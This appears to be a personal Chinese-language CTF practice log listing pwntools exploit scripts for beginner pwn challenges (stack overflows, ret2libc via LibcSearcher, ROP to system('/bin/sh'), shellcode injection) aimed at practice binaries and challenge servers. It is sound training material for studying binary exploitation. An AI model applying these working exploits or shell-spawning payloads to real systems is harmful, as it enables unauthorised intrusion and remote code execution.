20250728-20250803

20250729-20250803

题目复现

本周回家适应阶段，无难题，题目均为平时简单刷题练手，没有稳定的时间去研究好题

ciscn_2019_n_8

32位 canary pie NX

数组覆盖，入门题

#encoding=uft-8
#可本地复现
from pwn import *
io = process('./ciscn_2019_n_8')
io.sendline(b"aaaa"*13 + p32(0x11))
io.interactive()

bjdctf_2020_babystack

64位，NX

read溢出

#encoding=utf-8
#不可本地复现，远程靶机无栈迁移
from pwn import *
io = process('./pwn')
# io = remote('node5.buuoj.cn',25982) 
io.sendline('100')
payload  = (b'a' * 0x18)  + p64(0x04006E6)
io.sendline(payload)

io.interactive()

ciscn_2019_c_1

64位，NX

gets，简单libc

#encoding=utf-8
#不可本地复现
from pwn import*
from LibcSearcher import*

io=remote('node5.buuoj.cn',27290)
# io=process('./pwn')
elf=ELF('./pwn')

main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

io.sendlineafter('choice!\n','1')
payload=b'\0'+b'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)
# attach(io)
io.sendlineafter('encrypted\n',payload)
io.recvline()
io.recvline()
puts_addr=u64(io.recvuntil(b'\n')[:-1].ljust(8,b'\0'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libcbase = puts_addr - libc.dump('puts')
binsh = libcbase + libc.dump('str_bin_sh')
system = libcbase + libc.dump('system')
io.sendlineafter('choice!\n','1')
payload=b'\0'+b'a'*(0x50-1+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)

io.sendlineafter(b'encrypted\n',payload)
io.interactive()

jarvisoj_level2_x64

64位，NX

read溢出，system传参

#encoding=utf-8
#不可本地复现
from pwn import *
r = remote("node5.buuoj.cn", 29271)

system = 0x40063e
binsh = 0x400a90
poprdi = 0x4006b3

payload = b'a' * 0x80 + b'b' * 8 + p64(poprdi) + p64(binsh) + p64(system) 

r.sendlineafter(b'Input:\n', payload)
r.interactive()

get_started_3dsctf_2016

32位，静态编译，函数调用 or mprotect函数利用

#encoding=utf-8
#可本地复现
from pwn import*
from LibcSearcher import*

# io=remote('node5.buuoj.cn',29354)
io=process('./pwn')
elf=ELF('./pwn')


payload = b'a'*56
payload += p32(0x080489A0) + p32(0x0804E6A0)
payload += p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()

（2024CTF+）简单的签到

#!/usr/bin/env python
from pwn import *
context.arch = "amd64"
s = remote('nc1.ctfplus.cn', 45004)
#s = process('./main')
#shellcode = asm(shellcraft.sh())
s.recvuntil("to start our challenge.")
s.sendline(b'')
def formula_compute(formula: bytes, precise: bool = False):
    if isinstance(formula, bytes):
        formula = formula.decode("UTF-8")
    formula = formula.strip()
    formula = formula.strip("\n")
    formula = formula.split('=')[0].strip()
    formula = formula.replace("x", "*")
    formula = formula.replace("^", "**")
    formula = formula.replace("÷", "/")
    if not precise:
        formula = formula.replace("//", "/")
        formula = formula.replace("/", "//")
    return bytes(str(eval(formula)), encoding="UTF-8")
question = s.recvuntil(b"=")
answer = formula_compute(question)
s.sendline(answer)
s.interactive()

（2024CTF+）你会栈溢出吗

#!/usr/bin/env python
from pwn import *
context.arch = "amd64"
#elf = ELF('./pwn')
#s = process('./pwn')
s = remote('nc1.ctfplus.cn', 11259)
addr_ret = 0x40057e
payload = b'A'*20 +p64(addr_ret)  + p64(0x400728)
s.sendline(payload)
s.interactive()

（2024CTF+）ez_shellcode

#!/usr/bin/env python
from pwn import *


context.os='Linux'
context.arch='amd64'

sh = remote("nc1.ctfplus.cn",35838)
#sh = process('./pwn')
shellcode = asm(shellcraft.amd64.sh())
buf2_addr = 0x0000401256
sh.recvuntil(b"shellcode?")
sh.sendline(shellcode)
sh.recvuntil(b"name:")
addr_ret = 0x040101a
payload = b'A'* 32+p64(addr_ret) + p64(buf2_addr)
sh.sendline(payload)
sh.interactive()